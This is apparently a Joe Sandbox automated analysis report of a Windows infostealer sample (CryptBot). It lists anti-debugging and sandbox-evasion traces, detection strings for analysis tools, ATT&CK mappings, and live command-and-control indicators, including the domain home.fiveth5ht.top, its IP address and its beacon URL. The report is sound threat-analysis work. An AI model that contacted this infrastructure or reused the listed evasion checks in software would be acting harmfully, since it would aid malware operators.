Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B6E second address: 6E90B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 799B91C2h 0x00000010 mov ah, dl 0x00000012 popad 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B9C second address: 6E90BB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90BB3 second address: 6E90BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c jmp 00007F6FA127EBDEh 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90BE8 second address: 6E90BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA0B89511h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90BFD second address: 6E90C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C01 second address: 6E90C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA0B89513h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C1F second address: 6E90C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C31 second address: 6E90C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C35 second address: 6E90C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C7F second address: 6E90D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6FA0B8950Fh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edi, edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6FA0B8950Bh 0x00000017 or ax, 765Eh 0x0000001c jmp 00007F6FA0B89519h 0x00000021 popfd 0x00000022 mov dx, ax 0x00000025 popad 0x00000026 js 00007F70111D7EF6h 0x0000002c jmp 00007F6FA0B8950Ah 0x00000031 mov eax, dword ptr [ebp-04h] 0x00000034 jmp 00007F6FA0B89510h 0x00000039 mov dword ptr [esi+08h], eax 0x0000003c pushad 0x0000003d mov dx, cx 0x00000040 push ecx 0x00000041 jmp 00007F6FA0B89519h 0x00000046 pop eax 0x00000047 popad 0x00000048 lea eax, dword ptr [ebx+70h] 0x0000004b jmp 00007F6FA0B89517h 0x00000050 push 00000001h 0x00000052 pushad 0x00000053 mov di, ax 0x00000056 pushfd 0x00000057 jmp 00007F6FA0B89510h 0x0000005c sub esi, 380DB978h 0x00000062 jmp 00007F6FA0B8950Bh 0x00000067 popfd 0x00000068 popad 0x00000069 nop 0x0000006a jmp 00007F6FA0B89516h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F6FA0B8950Eh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90D7B second address: 6E90D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA127EBE0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90D9F second address: 6E90DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90DAE second address: 6E90DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90DB3 second address: 6E90E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6FA0B89515h 0x0000000a sub si, 6786h 0x0000000f jmp 00007F6FA0B89511h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 lea eax, dword ptr [ebp-18h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6FA0B89518h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90E06 second address: 6E90E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90E0C second address: 6E90E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90E12 second address: 6E90E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA127EBDEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90E2D second address: 6E90E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90E33 second address: 6E90E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90E39 second address: 6E90E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6FA0B8950Ch 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSpecial instruction interceptor: First address: 921963 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSpecial instruction interceptor: First address: B5A49C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00429980 rdtsc 0_2_00429980
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe TID: 8160Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0024255D
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002429FF
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0024255D
Source: s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: s8kPMNXOZY.exeBinary or memory string: Hyper-V RAW
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: s8kPMNXOZY.exe, 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: s8kPMNXOZY.exe, 00000000.00000003.1398563303.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398595351.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000002.1406402610.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398993637.0000000000F73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile opened: NTICE
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile opened: SICE
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_00429980 rdtsc 0_2_00429980
Source: s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: :Program Manager
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49715 -> 81.29.149.125:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
s8kPMNXOZY.exe52%VirustotalBrowse
s8kPMNXOZY.exe63%ReversingLabsWin32.Trojan.CryptBot
s8kPMNXOZY.exe100%AviraTR/Crypt.TPM.Gen
s8kPMNXOZY.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQ0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686269630%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
81.29.149.125
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmls8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQs8kPMNXOZY.exe, 00000000.00000003.1398993637.0000000000F73000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://html4/loose.dtds8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#s8kPMNXOZY.exefalse
                  		high
                  https://httpbin.org/ipbefores8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmls8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#s8kPMNXOZY.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSs8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963s8kPMNXOZY.exe, 00000000.00000003.1398627069.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000002.1406172841.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398924001.0000000000F04000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://curl.se/docs/alt-svc.htmls8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://.csss8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://.jpgs8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                34.226.108.155
                                		httpbin.orgUnited States
                                		14618AMAZON-AESUSfalse
                                81.29.149.125
                                		home.fiveth5ht.topSwitzerland
                                		39616COMUNICA_IT_SERVICESCHfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581592
                                Start date and time:2024-12-28 09:34:31 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 18s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:s8kPMNXOZY.exe
                                renamed because original name is a hash value
                                Original Sample Name:fbba61c61fa706eec44a022a1e9e3bac.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53, 4.245.163.56
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                03:35:32API Interceptor3x Sleep call for process: s8kPMNXOZY.exe modified
                                09:35:16Task SchedulerRun new task: {E8137BEC-A0E8-4A79-9371-57C6B4E9F5A6} path: .

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                34.226.108.155sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                  CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                        dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                          OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                            ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                              BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                  3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                    81.29.149.125GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    home.fiveth5ht.topGjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    COMUNICA_IT_SERVICESCHGjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                    • 81.29.149.45
                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    AMAZON-AESUSvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                    • 54.225.146.64
                                                    d8tp5flwzP.exeGet hashmaliciousMetasploitBrowse
                                                    • 18.209.65.151
                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
